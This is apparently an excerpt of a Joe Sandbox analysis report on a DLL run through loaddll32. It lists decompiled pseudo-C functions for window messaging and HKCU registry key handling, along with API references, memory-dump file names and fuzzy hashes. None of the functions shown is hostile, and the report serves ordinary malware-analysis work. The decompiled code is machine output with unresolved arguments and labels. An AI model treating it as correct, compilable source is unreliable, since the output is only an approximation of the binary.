						E100209E8( &_v280, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t79, 0, _t100);
						_t94 = E100105C8(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000E58E(_t94);
						}
						return E1001FC9C(_t77);
					}
				}
			}

0x100072bc
0x100072bc
0x100072bc
0x100072c3
0x100072c7
0x100072ce
0x100072d4
0x100072db
0x100072e2
0x100072e4
0x100072e7
0x100072ea
0x100072f1
0x100072f4
0x100072f6
0x100072f6
0x100072f9
0x100072fa
0x100072fc
0x10007301
0x10007303
0x10007305
0x1000730c
0x1000730e
0x1000730e
0x10007311
0x10007311
0x100072f6
0x10007316
0x10007319
0x100073f6
0x100073fc
0x10007404
0x10007405
0x10007406
0x1000740f
0x10007414
0x1000741b
0x1000731f
0x10007321
0x10007327
0x10007329
0x10007330
0x10007338
0x10007343
0x10007346
0x1000734b
0x10007353
0x10007357
0x10007358
0x1000735d
0x10007360
0x10007364
0x10007368
0x10007369
0x10007377
0x1000737b
0x10007383
0x10007389
0x1000738a
0x10007397
0x1000739d
0x1000739f
0x100073b4
0x100073b9
0x100073be
0x100073bf
0x100073c0
0x100073c0
0x100073c8
0x100073c8
0x100073da
0x100073e6
0x100073ee
0x100073f1
0x00000000
0x1000732b
0x10004e6e
0x10004e71
0x10004e7b
0x10004e82
0x10004e87
0x10004e88
0x10004e8f
0x10004e9e
0x10004ea0
0x10004ea3
0x10004ea7
0x10004eaa
0x10004eac
0x10004eac
0x10004eb6
0x10004eb6
0x10007329

APIs

__EH_prolog3.LIBCMT ref: 100072DB
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 10007397
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100073AE
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 100073C8
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100073DA

Strings

Software\, xrefs: 10007330

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
Instruction ID: 431f38651a312ef553f30843a41239907c7d8c638de5ca089e0c10656c75fbe4
Opcode Fuzzy Hash: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
Instruction Fuzzy Hash: 5C41AC35D00109AFEB11DBA4CC81AEFB7B9FF44380F50052AF555E6295DB38AA44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000A486 Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000A486(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E1000EEC4(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E100069E2(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E10006DDA(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E1000EF92(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E10006CF4(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E10005AC4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E1000EF92(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

0x1000a486
0x1000a48f
0x1000a497
0x1000a499
0x1000a49d
0x1000a4a1
0x1000a4af
0x1000a4af
0x1000a4b4
0x1000a4ba
0x1000a4be
0x1000a4c2
0x1000a4c7
0x1000a4cd
0x1000a545
0x1000a545
0x1000a545
0x1000a549
0x00000000
0x00000000
0x1000a4e1
0x1000a4e3
0x1000a54b
0x1000a54b
0x1000a54b
0x1000a552
0x00000000
0x00000000
0x1000a556
0x1000a55c
0x1000a564
0x1000a571
0x1000a579
0x1000a57b
0x1000a57b
0x1000a564
0x1000a57f
0x1000a581
0x1000a587
0x1000a589
0x1000a5c4
0x1000a5c4
0x1000a5c4
0x00000000
0x1000a58b
0x1000a58f
0x1000a596
0x1000a597
0x1000a599
0x1000a5a1
0x1000a5a1
0x1000a5b5
0x00000000
0x1000a5b7
0x00000000
0x1000a5b7
0x1000a5b5
0x1000a589
0x1000a5b9
0x1000a5ba
0x00000000
0x1000a5bf
0x1000a4e5
0x1000a4e7
0x1000a4eb
0x1000a4ed
0x1000a4f5
0x1000a4f7
0x1000a4f7
0x1000a4f7
0x1000a4f9
0x1000a4fe
0x1000a500
0x1000a504
0x1000a506
0x1000a50a
0x1000a519
0x1000a519
0x1000a50a
0x1000a504
0x1000a51f
0x1000a524
0x1000a541
0x1000a541
0x00000000
0x1000a526
0x1000a533
0x1000a539
0x1000a53d
0x1000a53f
0x00000000
0x00000000
0x00000000
0x1000a53f
0x1000a524
0x00000000

APIs

GetParent.USER32(00000004), ref: 1000A4B4
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000A4DB
UpdateWindow.USER32(00000004), ref: 1000A4F5
SendMessageA.USER32 ref: 1000A519
SendMessageA.USER32 ref: 1000A533
UpdateWindow.USER32(00000004), ref: 1000A579
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000A5AD

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
Instruction ID: db41b359fa61aebdb5d40a64e0a657e9155f7da8113a89a494e7da7d34e0904b
Opcode Fuzzy Hash: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
Instruction Fuzzy Hash: A3417E30604B829FF711CF258C88A1BBAF5FFCABD5F104A2DF5819606AD761D984CA52

Uniqueness

Uniqueness Score: -1.00%

Function 1000634E Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000634E(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E10005CAE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000EC09(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E1000BB9A(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E1000BB9A(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E1000BBDF(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E1000BB9A(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10044410;
						E100209E8( &_v28, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t37, _t46, _t51);
						_t43 = E100105C8(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000E58E(_t43);
						}
						return E1001FC9C(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

0x1000634e
0x1000634e
0x1000634e
0x10006353
0x1000636e
0x10006370
0x10006372
0x1000637d
0x10006383
0x10006385
0x10006387
0x10006388
0x1001132f
0x10011331
0x10011334
0x10011336
0x10011358
0x00000000
0x10011338
0x10011338
0x1001133d
0x1001133f
0x10011350
0x10011350
0x10011357
0x10011357
0x1000638a
0x10011290
0x10011290
0x10011291
0x10011292
0x10011293
0x10011294
0x10011295
0x10011299
0x1001129f
0x100112a5
0x100112be
0x100112be
0x100112c0
0x100112c2
0x00000000
0x00000000
0x100112b2
0x100112b4
0x100112b6
0x10011328
0x1001132d
0x100112b8
0x100112b9
0x00000000
0x100112b9
0x00000000
0x100112b6
0x100112c4
0x100112dc
0x100112dc
0x100112de
0x100112e0
0x00000000
0x00000000
0x100112d0
0x100112d2
0x100112d4
0x00000000
0x100112d6
0x100112d7
0x00000000
0x100112d7
0x00000000
0x100112d4
0x100112e2
0x100112e6
0x100112eb
0x100112ed
0x100112f7
0x1001130e
0x1001130e
0x10011310
0x10011312
0x10011313
0x00000000
0x00000000
0x10011302
0x10011304
0x10011306
0x10011309
0x00000000
0x10011309
0x00000000
0x10011306
0x10011326
0x00000000
0x100112ef
0x00000000
0x100112ef
0x100112ed
0x10006374
0x10004e6e
0x10004e6e
0x10004e71
0x10004e7b
0x10004e82
0x10004e87
0x10004e88
0x10004e8f
0x10004e9e
0x10004ea0
0x10004ea3
0x10004ea7
0x10004eaa
0x10004eac
0x10004eac
0x10004eb6
0x10004eb6
0x10006355
0x10006355
0x1000635a
0x00000000
0x10006361
0x10006367
0x10006367
0x00000000

APIs

GetCapture.USER32 ref: 10011299
SendMessageA.USER32 ref: 100112B2
GetFocus.USER32(?,?,?,?,00000000), ref: 100112C4
SendMessageA.USER32 ref: 100112D0
GetLastActivePopup.USER32(?), ref: 100112F7
SendMessageA.USER32 ref: 10011302
SendMessageA.USER32 ref: 10011326

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
Instruction ID: 5a63e8befbd248d730497780d713f82145d505fb4d7f97fa76e00961cd780979
Opcode Fuzzy Hash: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
Instruction Fuzzy Hash: BB31057170032AAFE715EB24CC84EAF7BEEEB896C4B224579F400CB159CB31DC4196A1

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000AA1E(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E100069D9();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000EC3C(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10020F40(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000A84C(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000A96A(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x1000aa27
0x1000aa2e
0x1000aa34
0x1000aa39
0x1000aa5e
0x1000aa5e
0x1000aa64
0x1000aa66
0x1000aa66
0x1000aa64
0x1000aa69
0x1000aa6e
0x1000aa72
0x1000aa75
0x1000aa75
0x1000aa78
0x1000aa80
0x1000aa85
0x1000aa85
0x1000aa88
0x1000aa8c
0x1000aa8f
0x1000aa96
0x1000aa9b
0x1000aa9d
0x1000aaa1
0x1000aaab
0x1000aab0
0x1000aab6
0x1000aab9
0x1000aaca
0x1000aad1
0x1000aad4
0x1000aad4
0x1000aaa1
0x1000aa9b
0x1000aaea
0x1000aaec
0x1000aafb
0x1000ab07
0x1000ab0b
0x1000ab13
0x1000ab13
0x1000ab0b
0x1000ab1b
0x1000ab2e

APIs

_memset.LIBCMT ref: 1000AAAB
SendMessageA.USER32 ref: 1000AAD4
GetWindowLongA.USER32 ref: 1000AAE6
GetWindowLongA.USER32 ref: 1000AAF7
SetWindowLongA.USER32 ref: 1000AB13

Strings

(, xrefs: 1000AACA

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
Instruction ID: a20b66fbb02a5be130650eb81bbfdf56ba9fafbfecf6f606b31a3a4f2e66e107
Opcode Fuzzy Hash: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
Instruction Fuzzy Hash: 7B31A1357007119FEB10DFB8C994A5EB7E8FF4A290F11062DE542A7A96DB31E840CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1001A96C Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1001A96C(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E1000A8F0(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E1000EFB3(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1001A96C(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E1000A8F0(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1001A917(_t45, E1000A8F0(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}

0x1001a96c
0x1001a96c
0x1001a96e
0x1001a975
0x1001aa15
0x1001aa19
0x1001aa28
0x1001aa2c
0x1001a9d7
0x1001a9e7
0x1001aa3e
0x00000000
0x1001aa3e
0x1001a9e9
0x1001a9ea
0x1001a9f1
0x1001aa03
0x1001aa32
0x1001aa32
0x1001aa33
0x1001aa35
0x00000000
0x1001aa35
0x1001aa05
0x1001aa0e
0x00000000
0x00000000
0x00000000
0x1001aa10
0x1001aa10
0x1001aa10
0x1001aa11
0x1001aa12
0x1001aa36
0x1001aa3b
0x00000000
0x1001aa3d
0x1001a9f1
0x00000000
0x1001aa2e
0x1001a98a
0x1001a98f
0x1001a9c3
0x1001a9ab
0x1001a9af
0x00000000
0x1001a9b5
0x1001a9be
0x00000000
0x1001a9be
0x1001a9af
0x1001a9d5
0x00000000

APIs

GetWindow.USER32(?,00000002), ref: 1001A987
GetParent.USER32(?), ref: 1001A998
GetWindow.USER32(?,00000002), ref: 1001A9BB
GetWindow.USER32(?,00000002), ref: 1001A9CD
GetWindowLongA.USER32 ref: 1001A9DC
IsWindowVisible.USER32(?), ref: 1001A9F6
GetTopWindow.USER32(?), ref: 1001AA1C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
Instruction ID: afcf25548e9ffcd49ee0c38f979e935dd92c7862c2c1ebd23c82871fc7a90cd9
Opcode Fuzzy Hash: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
Instruction Fuzzy Hash: 0121B232A407516FD621DA758D05F1B76ECFF4A690F424524F981AF152EB30ECC0C761

Uniqueness

Uniqueness Score: -1.00%

Function 10010EA7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010EA7(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10010ec2
0x10010ec9
0x10010ecc
0x10010ecf
0x10010ed2
0x10010edd
0x10010f14
0x10010f14
0x10010f1f
0x10010f24
0x10010f24
0x10010f29
0x10010f2e
0x10010f2e
0x10010f37

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10010ED5
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010EF8
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010F14
RegCloseKey.ADVAPI32(?), ref: 10010F24
RegCloseKey.ADVAPI32(?), ref: 10010F2E

Strings

software, xrefs: 10010EBD

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

